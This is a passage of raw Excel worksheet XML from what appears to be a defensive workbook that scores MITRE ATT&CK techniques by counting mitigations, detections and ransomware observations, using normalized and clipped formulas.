      <c r="G72" s="51">
        <v>1</v>
      </c>
      <c r="H72" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I72">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J72">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K72">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L72">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M72" s="44">
        <v>6.0416799999999998E-3</v>
      </c>
      <c r="N72" s="51">
        <v>0</v>
      </c>
      <c r="O72" s="51">
        <v>12</v>
      </c>
      <c r="P72" s="51">
        <v>0</v>
      </c>
      <c r="Q72" s="51">
        <v>0</v>
      </c>
      <c r="R72" s="52">
        <v>2.7</v>
      </c>
      <c r="S72" s="51">
        <v>1</v>
      </c>
      <c r="T72" s="52" t="s">
        <v>319</v>
      </c>
      <c r="U72" s="51">
        <v>6</v>
      </c>
      <c r="V72" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1238095238095238</v>
      </c>
      <c r="W72">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X72">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y72">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z72">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>12</v>
      </c>
      <c r="AA72">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.12</v>
      </c>
      <c r="AB72">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.12</v>
      </c>
      <c r="AC72" s="29" t="s">
        <v>371</v>
      </c>
      <c r="AD72" s="25" t="str" cm="1">
        <f t="array" ref="AD72">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC72)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE72" s="25">
        <f>IF(AD72="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF72" s="25" t="str" cm="1">
        <f t="array" ref="AF72">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC72)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG72" s="25">
        <f>IF(AF72="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH72" s="25" t="str" cm="1">
        <f t="array" ref="AH72">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC72)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI72" s="25">
        <f>IF(AH72="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ72" s="25" t="str" cm="1">
        <f t="array" ref="AJ72">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC72)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK72" s="25">
        <f>IF(AJ72="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL72" s="25" t="str" cm="1">
        <f t="array" ref="AL72">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC72)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM72" s="25">
        <f>IF(AL72="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN72" s="52">
        <v>0</v>
      </c>
      <c r="AO72" s="51">
        <v>0</v>
      </c>
      <c r="AP72" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7536174216380948E-2</v>
      </c>
      <c r="AQ72" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.1787247387936491E-2</v>
      </c>
      <c r="AR72" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.1787247387936491E-2</v>
      </c>
      <c r="AS72" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT72" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU7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73" spans="1:47">
      <c r="A73" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.8697301095238096E-2</v>
      </c>
      <c r="B73" s="25">
        <f>SUM(H73,M73,V73)*(1+SUM(AE73,AG73,AI73,AK73,AM73))</f>
        <v>0.32030634428571431</v>
      </c>
      <c r="C73" s="25" t="s">
        <v>372</v>
      </c>
      <c r="D73" s="25" t="s">
        <v>373</v>
      </c>
      <c r="E73" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F73" s="51">
        <v>1</v>
      </c>
      <c r="G73" s="51">
        <v>1</v>
      </c>
      <c r="H73" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I73">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J73">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K73">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L73">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M73" s="44">
        <v>6.0206299999999999E-3</v>
      </c>
      <c r="N73" s="51">
        <v>0</v>
      </c>
      <c r="O73" s="51">
        <v>5</v>
      </c>
      <c r="P73" s="51">
        <v>0</v>
      </c>
      <c r="Q73" s="51">
        <v>0</v>
      </c>
      <c r="R73" s="52" t="s">
        <v>374</v>
      </c>
      <c r="S73" s="51">
        <v>3</v>
      </c>
      <c r="T73" s="51" t="s">
        <v>375</v>
      </c>
      <c r="U73" s="51">
        <v>17</v>
      </c>
      <c r="V73" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2142857142857143</v>
      </c>
      <c r="W73">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>20</v>
      </c>
      <c r="X73">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Y73">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Z73">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA73">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB73">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC73" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD73" s="25" t="str" cm="1">
        <f t="array" ref="AD73">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC73)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE73" s="25">
        <f>IF(AD73="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF73" s="25" t="str" cm="1">
        <f t="array" ref="AF73">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC73)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG73" s="25">
        <f>IF(AF73="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH73" s="25" t="str" cm="1">
        <f t="array" ref="AH73">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC73)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI73" s="25">
        <f>IF(AH73="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ73" s="25" t="str" cm="1">
        <f t="array" ref="AJ73">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC73)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK73" s="25">
        <f>IF(AJ73="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL73" s="25" t="str" cm="1">
        <f t="array" ref="AL73">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC73)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM73" s="25">
        <f>IF(AL73="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN73" s="52">
        <v>2</v>
      </c>
      <c r="AO73" s="51">
        <v>1</v>
      </c>
      <c r="AP73" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.8697301095238096E-2</v>
      </c>
      <c r="AQ73" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10676878142857144</v>
      </c>
      <c r="AR73" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10676878142857144</v>
      </c>
      <c r="AS73" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT73" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU7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74" spans="1:47">
      <c r="A74" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6285879714285715E-2</v>
      </c>
      <c r="B74" s="25">
        <f>SUM(H74,M74,V74)*(1+SUM(AE74,AG74,AI74,AK74,AM74))</f>
        <v>0.26285879714285715</v>
      </c>
      <c r="C74" s="25" t="s">
        <v>376</v>
      </c>
      <c r="D74" s="25" t="s">
        <v>377</v>
      </c>
      <c r="E74" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F74" s="51">
        <v>1</v>
      </c>
      <c r="G74" s="51">
        <v>1</v>
      </c>
      <c r="H74" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I74">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J74">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K74">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L74">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M74" s="44">
        <v>5.7159400000000001E-3</v>
      </c>
      <c r="N74" s="51">
        <v>0</v>
      </c>
      <c r="O74" s="51">
        <v>2</v>
      </c>
      <c r="P74" s="51">
        <v>0</v>
      </c>
      <c r="Q74" s="51">
        <v>5</v>
      </c>
      <c r="R74" s="52" t="s">
        <v>378</v>
      </c>
      <c r="S74" s="51">
        <v>8</v>
      </c>
      <c r="T74" s="52" t="s">
        <v>379</v>
      </c>
      <c r="U74" s="51">
        <v>5</v>
      </c>
      <c r="V74" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15714285714285714</v>
      </c>
      <c r="W74">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X74">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y74">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z74">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA74">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB74">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC74" s="29"/>
      <c r="AD74" s="25" t="str" cm="1">
        <f t="array" ref="AD74">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC74)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE74" s="25">
        <f>IF(AD74="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF74" s="25" t="str" cm="1">
        <f t="array" ref="AF74">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC74)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG74" s="25">
        <f>IF(AF74="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH74" s="25" t="str" cm="1">
        <f t="array" ref="AH74">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC74)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI74" s="25">
        <f>IF(AH74="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ74" s="25" t="str" cm="1">
        <f t="array" ref="AJ74">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC74)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK74" s="25">
        <f>IF(AJ74="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL74" s="25" t="str" cm="1">
        <f t="array" ref="AL74">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC74)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM74" s="25">
        <f>IF(AL74="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN74" s="52">
        <v>0</v>
      </c>
      <c r="AO74" s="51">
        <v>0</v>
      </c>
      <c r="AP74" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6285879714285715E-2</v>
      </c>
      <c r="AQ74" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.7619599047619054E-2</v>
      </c>
      <c r="AR74" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.7619599047619054E-2</v>
      </c>
      <c r="AS74" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT74" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU7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75" spans="1:47" ht="48">
      <c r="A75" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.047253848533333E-2</v>
      </c>
      <c r="B75" s="25">
        <f>SUM(H75,M75,V75)*(1+SUM(AE75,AG75,AI75,AK75,AM75))</f>
        <v>0.70472538485333336</v>
      </c>
      <c r="C75" s="25" t="s">
        <v>380</v>
      </c>
      <c r="D75" s="25" t="s">
        <v>381</v>
      </c>
      <c r="E75" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F75" s="51">
        <v>2</v>
      </c>
      <c r="G75" s="51">
        <v>3</v>
      </c>
      <c r="H75" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I75">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J75">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K75">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L75">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M75" s="44">
        <v>4.9182399999999999E-3</v>
      </c>
      <c r="N75" s="51">
        <v>0</v>
      </c>
      <c r="O75" s="51">
        <v>3</v>
      </c>
      <c r="P75" s="51">
        <v>3</v>
      </c>
      <c r="Q75" s="51">
        <v>2</v>
      </c>
      <c r="R75" s="52" t="s">
        <v>382</v>
      </c>
      <c r="S75" s="51">
        <v>12</v>
      </c>
      <c r="T75" s="52" t="s">
        <v>383</v>
      </c>
      <c r="U75" s="51">
        <v>19</v>
      </c>
      <c r="V75" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="W75">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>31</v>
      </c>
      <c r="X75">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Y75">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Z75">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA75">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB75">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC75" s="29" t="s">
        <v>384</v>
      </c>
      <c r="AD75" s="25" t="str" cm="1">
        <f t="array" ref="AD75">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC75)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE75" s="25">
        <f>IF(AD75="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF75" s="25" t="str" cm="1">
        <f t="array" ref="AF75">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC75)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG75" s="25">
        <f>IF(AF75="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH75" s="25" t="str" cm="1">
        <f t="array" ref="AH75">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC75)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI75" s="25">
        <f>IF(AH75="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ75" s="25" t="str" cm="1">
        <f t="array" ref="AJ75">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC75)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK75" s="25">
        <f>IF(AJ75="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL75" s="25" t="str" cm="1">
        <f t="array" ref="AL75">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC75)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM75" s="25">
        <f>IF(AL75="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN75" s="52">
        <v>0</v>
      </c>
      <c r="AO75" s="51">
        <v>0</v>
      </c>
      <c r="AP75" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.047253848533333E-2</v>
      </c>
      <c r="AQ75" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.23490846161777779</v>
      </c>
      <c r="AR75" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.23490846161777779</v>
      </c>
      <c r="AS75" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT75" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU7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76" spans="1:47" ht="80.099999999999994">
      <c r="A76" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.19144284594171429</v>
      </c>
      <c r="B76" s="25">
        <f>SUM(H76,M76,V76)*(1+SUM(AE76,AG76,AI76,AK76,AM76))</f>
        <v>1.2477617927504763</v>
      </c>
      <c r="C76" s="25" t="s">
        <v>385</v>
      </c>
      <c r="D76" s="25" t="s">
        <v>386</v>
      </c>
      <c r="E76" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F76" s="51">
        <v>1</v>
      </c>
      <c r="G76" s="51">
        <v>16</v>
      </c>
      <c r="H76" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.55000000000000004</v>
      </c>
      <c r="I76">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J76">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K76">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>1.6</v>
      </c>
      <c r="L76">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>1</v>
      </c>
      <c r="M76" s="44">
        <v>4.6932700000000003E-3</v>
      </c>
      <c r="N76" s="51">
        <v>0</v>
      </c>
      <c r="O76" s="51">
        <v>6</v>
      </c>
      <c r="P76" s="51">
        <v>3</v>
      </c>
      <c r="Q76" s="51">
        <v>0</v>
      </c>
      <c r="R76" s="52" t="s">
        <v>387</v>
      </c>
      <c r="S76" s="51">
        <v>10</v>
      </c>
      <c r="T76" s="52" t="s">
        <v>388</v>
      </c>
      <c r="U76" s="51">
        <v>13</v>
      </c>
      <c r="V76" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.26190476190476192</v>
      </c>
      <c r="W76">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>23</v>
      </c>
      <c r="X76">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Y76">
